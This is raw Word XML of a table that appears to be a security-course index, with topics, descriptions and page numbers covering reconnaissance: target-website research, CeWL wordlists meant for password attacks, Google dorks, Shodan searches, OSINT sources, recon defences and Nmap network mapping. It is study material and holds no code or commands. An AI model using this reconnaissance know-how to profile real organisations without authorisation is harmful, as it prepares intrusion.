            </w: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3C051981" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00D37EC4" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>35</w:t>
            </w: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3135CAA7" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="008142F2" w:rsidP="003A28B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="434D232A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BEE6C06" w14:textId="3E5B678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r w:rsidR="008142F2" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>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303EB88C" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="008142F2" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="548BE44F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014AD535" w14:textId="7EFAE0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8142F2" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33DEB153" w14:textId="100360A3" w:rsidR="00303D06" w:rsidRDefault="006C49CE" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Search the target’s own websites:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478EB2FE"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Press releases</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54ECD79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Technical papers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214D2903"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Design documents</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF1559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Sample deliverables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379E9A8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Open positions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F906006"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Key people</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077FF9E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Contacts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E71A86" w14:textId="58CE380A" w:rsidR="006C49CE" w:rsidRDefault="006C49CE" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Search related sites</w:t>
            </w:r>
            <w:r w:rsidR="00557258">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE208A7" w14:textId="780E5353" w:rsidR="006C49CE" w:rsidRPr="006C49CE" w:rsidRDefault="006C49CE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="63"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C49CE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Business partners, suppliers, subsidiaries. </w:t>
            </w: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Exiftool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C24F89" w14:textId="1830DA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6CA7194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CeWL</w:t>
            </w:r>
            <w:r w:rsidR="000712E4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Custom Wordlist generator by robin wood.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470A110C"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CeWL crawls a target website and collects all web pages and common documents formats (MS Office, PDF, Images)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F539CBB"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Extracts content, metadata, and other strings to one of more files.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E0DED3" w14:textId="11D90712" w:rsidR="000712E4" w:rsidRPr="006F5A04" w:rsidRDefault="000712E4" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Useful to build wordlists from a target site’s content and metadata for later attacks (password attacks, host enumeration, and more).</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596EFF20" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="008142F2" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidR="00303D06" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with Search Engines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5252DC22" w14:textId="76A5091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r w:rsidR="000712E4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Google </w:t>
            </w:r>
            <w:r w:rsidR="007B2148">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>searches</w:t>
            </w:r>
            <w:r w:rsidR="000712E4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> that can reveal vulnerable sites or other useful information to an attacker.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A954C5" w14:textId="0CF1C4B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Hacking Database</w:t>
            </w:r>
            <w:r w:rsidR="000712E4">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: A vast collection of Google Dorks.</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73CBC974" w14:textId="77777777" w:rsidR="007563C3" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Public databases</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563D2A56" w14:textId="77777777" w:rsidR="007563C3" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SEC’s Edgar database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11684617" w14:textId="410C4E8C" w:rsidR="007563C3" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Job and professional networking sites (LinkedIn, indeed, monster)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5719830E" w14:textId="4604B683" w:rsidR="007563C3" w:rsidRDefault="00000000" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidR="007563C3" w:rsidRPr="00C51E00">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>www.xlek.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6C7E4B2C" w14:textId="77777777" w:rsidR="007563C3" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>whatsmyname.app</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541E1452" w14:textId="77777777" w:rsidR="007563C3" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>other open-source information</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1B516A" w14:textId="77777777" w:rsidR="007563C3" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>newspapers, blogs, and magazines</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="304B7761" w14:textId="11E61026" w:rsidR="007563C3" w:rsidRPr="006F5A04" w:rsidRDefault="007563C3" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>social networking sites (what expertise, which friends/associates)</w:t>
            </w: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Web-Based Recon/Attack Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A26316A"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Many websites offer the ability to research or even attack other sites.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DAA63FB"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Links to the internet scanning webpages (traceroute, ping, port scans, denial-of-service tests)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A55906F" w14:textId="77777777" w:rsidR="00090F03" w:rsidRDefault="00090F03" w:rsidP="00090F03">
            <w:pPr>
              <w:ind w:right="1082"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">www.shodan.io  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F67875E" w14:textId="63EEC702" w:rsidR="00090F03" w:rsidRPr="006F5A04" w:rsidRDefault="00090F03" w:rsidP="00090F03">
            <w:pPr>
              <w:ind w:right="1082"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>www.network-tools.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FE41B2" w14:textId="77777777" w:rsidR="00090F03" w:rsidRDefault="00090F03" w:rsidP="00090F03">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">viewdns.info  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A6C34B4" w14:textId="1485584E" w:rsidR="00090F03" w:rsidRPr="00090F03" w:rsidRDefault="00000000" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidR="00090F03" w:rsidRPr="00C51E00">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>www.securityspace.com</w:t>
              </w:r>
            </w:hyperlink>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480290" w:rsidRPr="006F5A04" w14:paraId="549D37FE" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="38B775FC" w14:textId="5ED5AF2A" w:rsidR="00480290" w:rsidRPr="006F5A04" w:rsidRDefault="00480290" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029EA03C" w14:textId="728EE49E" w:rsidR="00480290" w:rsidRDefault="00030003" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use Shodan advanced search operators.org, net, and port to find know targets withing your own organization. Negate searches with an exclamation point. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="713628F3" w14:textId="6AFCA161" w:rsidR="00030003" w:rsidRDefault="00030003" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shodan is an online service that crawls the internet like google, but it indexes service banners. Banners for services like FTP and Telnet will often have a unique signature to identify that service, vendor, and version number. You can negate the search by including an exclamation point before the term.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45CDDB67" w14:textId="03FC2A79" w:rsidR="00480290" w:rsidRPr="006F5A04" w:rsidRDefault="00030003" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0566D244" w14:textId="2CA2BB57" w:rsidR="00480290" w:rsidRPr="006F5A04" w:rsidRDefault="00030003" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="57974CB6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08550B71" w14:textId="6E86E2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7563C3" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Defenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F20FCE"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robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B1FA1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and control information</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F88E0BF"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Know what information is given away and perform risk analysis.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D8C04A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data indexed by search engines using robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F9B3BE7"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Be careful not to point attackers to your sensitive data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605995FA"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 xml:space="preserve">Look for web spider/crawler activity </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A4B3CF" w14:textId="42079BB2" w:rsidR="0036128A" w:rsidRPr="006F5A04" w:rsidRDefault="0036128A" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Logs show systematic access of entire website, page by page.</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7148C5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r w:rsidR="007563C3" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B9E6829" w14:textId="7830C4F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723072A3" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00C33E52" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>48</w:t>
            </w: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772B4E45" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>An Attacker wants to understand the topology of the target network:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1452C4A4" w14:textId="77777777" w:rsidR="00E96F97" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Internet connectivity, perimeter networks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E556653" w14:textId="77777777" w:rsidR="00E96F97" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Internal network (with access from modem or wireless access point)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C0391B0" w14:textId="1D98EC0D" w:rsidR="00E96F97" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can reveal vulnerabilities (or at least disclose the network architecture.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E6AFFC9" w14:textId="77777777" w:rsidR="00E96F97" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap can be used for network aping and port scanning.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="339CFC1E" w14:textId="77777777" w:rsidR="00E96F97" w:rsidRDefault="00E96F97" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
